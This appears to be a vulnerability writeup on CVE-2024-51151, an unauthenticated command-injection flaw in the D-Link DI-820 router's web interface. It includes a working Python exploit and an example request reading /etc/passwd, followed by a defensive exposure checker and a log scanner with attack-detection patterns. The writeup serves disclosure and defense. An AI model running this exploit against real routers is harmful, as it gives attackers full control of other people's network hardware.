If you’re using a D-Link DI-820 (Firmware 16.07.26A1), you need to pay close attention to CVE-2024-51151, a remote command execution (RCE) vulnerability in the router’s web interface. An unauthenticated attacker can run arbitrary commands on the device through a single poorly validated endpoint: /msp_info.htm.

Let’s break this down in simple terms, go over how it works, how to exploit it, and what you can do to protect yourself.

What’s Happening?

The DI-820 firmware’s web server contains a function called msp_info_htm. It handles requests to /msp_info.htm and reads two request parameters, flag and cmd. The flaw: the values of those parameters are passed into a system command without being validated or sanitized.

That means if an attacker crafts the right URL, they can execute commands directly on your router, as if they had access to the device’s terminal. This could let them steal data, reconfigure your network, or launch attacks on your other devices.

Exploit Walkthrough

The attacker doesn’t need to log in. They simply send a request to the router’s /msp_info.htm and inject their commands inside the flag or cmd parameter.

Proof-of-Concept (PoC) Exploit

Here’s a simple Python script using requests that demonstrates the vulnerability. This will execute a harmless command (id), but ANY command can be injected in the real world.

import requests

router_ip = '192.168.0.1'   # Placeholder; replace with your router's IP

# Command we want to execute
payload = 'id'  # Replace 'id' with another command, e.g. 'cat /etc/passwd'

url = f'http://{router_ip}/msp_info.htm'
params = {
    'flag': 'system',        # This parameter is vulnerable
    'cmd': payload           # Our injected payload
}

# A timeout keeps the script from hanging if the device drops the connection
r = requests.get(url, params=params, timeout=10)
print("[+] Response from router:")
print(r.text)

Replace the payload variable with any shell command you want to run.

Example Exploit Request

GET /msp_info.htm?flag=system&cmd=cat%20/etc/passwd HTTP/1.1
Host: 192.168.0.1    (placeholder; use your router's IP)
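The PoC above confirms the bug by looking for the output of id, but a page that simply reflects the cmd parameter back into the HTML could be mistaken for execution. The following is an added example (not code from the original page or from D-Link) of a stricter exposure check: it sends a command containing POSIX shell arithmetic, which only turns into "42" if a shell actually ran it. The endpoint and parameter names are from the advisory, and 'flag': 'system' is carried over from the PoC; the probe command, the response classification, the assumption that the device shell supports $(( )) (busybox ash does), and the placeholder IP are assumptions made for this example.

```python
import secrets
import sys
from urllib.error import URLError
from urllib.parse import urlencode
from urllib.request import urlopen

# The endpoint and the two parameter names come from the advisory above;
# 'flag': 'system' is carried over from the page's PoC. The probe command
# and the response classification are assumptions made for this example.
VULN_PATH = "/msp_info.htm"


def build_probe(token: str) -> dict:
    """Return query parameters whose output can only appear if a shell ran them.

    $((40+2)) is POSIX shell arithmetic (supported by busybox ash, the usual
    shell on embedded devices; an assumption for this device). It expands to
    42 only when the string is actually executed. A page that merely reflects
    the raw parameter would contain '$((40+2))' literally.
    """
    return {"flag": "system", "cmd": f"echo {token}-$((40+2))"}


def evidence_of_execution(body: str, token: str) -> str:
    """Classify a response body as 'executed', 'reflected' or 'none'."""
    if f"{token}-42" in body:
        return "executed"
    if f"{token}-$((40+2))" in body:
        return "reflected"
    return "none"


def check_device(router_ip: str, timeout: float = 5.0) -> str:
    """Send one unauthenticated probe and classify the result.

    Only run this against a device you own or are authorized to test.
    """
    token = secrets.token_hex(4)  # fresh per run, so stale output cannot match
    url = f"http://{router_ip}{VULN_PATH}?{urlencode(build_probe(token))}"
    try:
        with urlopen(url, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", errors="replace")
    except (URLError, OSError) as exc:
        return f"error: {exc}"
    return evidence_of_execution(body, token)


if __name__ == "__main__":
    ip = sys.argv[1] if len(sys.argv) > 1 else "192.168.0.1"  # placeholder IP
    print(f"{ip}: {check_device(ip)}")
```

Usage: python3 check_di820.py 192.168.0.1. A result of "executed" means the shell ran the probe; "reflected" means the parameter was echoed back without execution; "error" covers timeouts, refused connections and non-2xx responses, so a device that answers with an error page is not proven safe by this check alone.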

Technical Details

- The backend web server for this router appears to pass the values of flag and cmd directly into a system command without filtering.
- No authentication is enforced before the function runs.
- The output of the command is returned in the HTTP response, which makes exploitation easy to confirm and automate.
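Because every request goes to a fixed path with two known parameter names, exploitation attempts are easy to spot in the logs of a proxy, IDS or gateway sitting in front of the router. The following is an added example (not from the original page) that scans combined-format access log lines for requests to /msp_info.htm, decodes the query string, and rates each hit by whether flag or cmd carries shell metacharacters or an embedded argument. The sample log lines are constructed for this example and are not real traffic; the severity scale is this example's own choice.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in a common combined log format, as a proxy or
# network sensor in front of the router might record them. They are made up
# for this example and are not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Nov/2024:09:45:18 +0000] "GET /index.htm HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [21/Nov/2024:09:45:20 +0000] "GET /msp_info.htm?flag=system&cmd=cat%20/etc/passwd HTTP/1.1" 200 1204 "-" "python-requests/2.32.3"
203.0.113.7 - - [21/Nov/2024:09:45:21 +0000] "GET /msp_info.htm?flag=system&cmd=id HTTP/1.1" 200 88 "-" "python-requests/2.32.3"
198.51.100.9 - - [21/Nov/2024:09:46:02 +0000] "GET /msp_info.htm?flag=status HTTP/1.1" 200 644 "-" "Mozilla/5.0"
10.0.0.5 - - [21/Nov/2024:09:47:10 +0000] "POST /msp_info.htm HTTP/1.1" 200 300 "-" "curl/8.4.0"
"""

# Combined log format: client, identity, user, [timestamp], "METHOD target proto", status, size
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

# Characters that only make sense if the value is going to reach a shell.
SHELL_META = re.compile(r"[;&|`$<>\\\n]")

VULN_PATH = "/msp_info.htm"  # endpoint named in the advisory
SUSPECT_PARAMS = ("cmd", "flag")  # parameters named in the advisory


def classify(line: str):
    """Return a finding dict for a suspicious request, or None.

    Severity (this example's scale): 'high' if cmd or flag carries shell
    metacharacters or a space (an embedded argument), 'medium' if cmd is
    present at all, 'low' for any other request to the endpoint with flag.
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path != VULN_PATH:
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    values = {k: v[0] for k, v in qs.items() if k in SUSPECT_PARAMS}
    if not values:
        return None  # endpoint hit without the parameters of interest
    if any(SHELL_META.search(v) or " " in v for v in values.values()):
        severity = "high"
    elif "cmd" in values:
        severity = "medium"
    else:
        severity = "low"
    return {"src": m.group("src"), "ts": m.group("ts"), "severity": severity, "params": values}


def scan(log_text: str) -> list:
    """Run classify() over every line and return the findings in order."""
    return [f for f in (classify(line) for line in log_text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['src']:15} {f['ts']} {f['params']}")
```

On the constructed lines this yields one high (cat /etc/passwd), one medium (id) and one low (flag=status) finding; the index.htm request and the POST without query parameters are ignored. Pointing scan() at a real log file is a matter of reading it into a string, and the low-severity branch is where legitimate use of the page will land, so tune the thresholds to your environment.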

Prevalence and Discovery

This vulnerability was publicly disclosed in November 2024 (see the timeline below) and is reported against firmware version 16.07.26A1. D-Link may not provide updates for legacy devices, which makes this a lasting risk for anyone still running the affected hardware.

References

- Official CVE: CVE-2024-51151
- D-Link Product Page (DI-820)
- Security Researcher Advisory (Exploit Database)

Long-term

- Check D-Link’s Firmware Download page for updates or patches.
- If no updates are available, consider replacing the router with a device still receiving security fixes.

Final Thoughts

CVE-2024-51151 is a critical and straightforward flaw that brings real risks for anyone with a D-Link DI-820 (firmware 16.07.26A1). The attack is easy to pull off and can give outside attackers total control over your network hardware.

If you use this router, take action now—restrict access, patch if possible, or consider an upgrade.

Stay Secure!

If you want more details or have a tip about another vulnerable router, reach out to your local IT community or visit D-Link’s support.

Timeline

Published on: 11/21/2024 09:45:18 UTC
Last modified on: 11/22/2024 17:15:09 UTC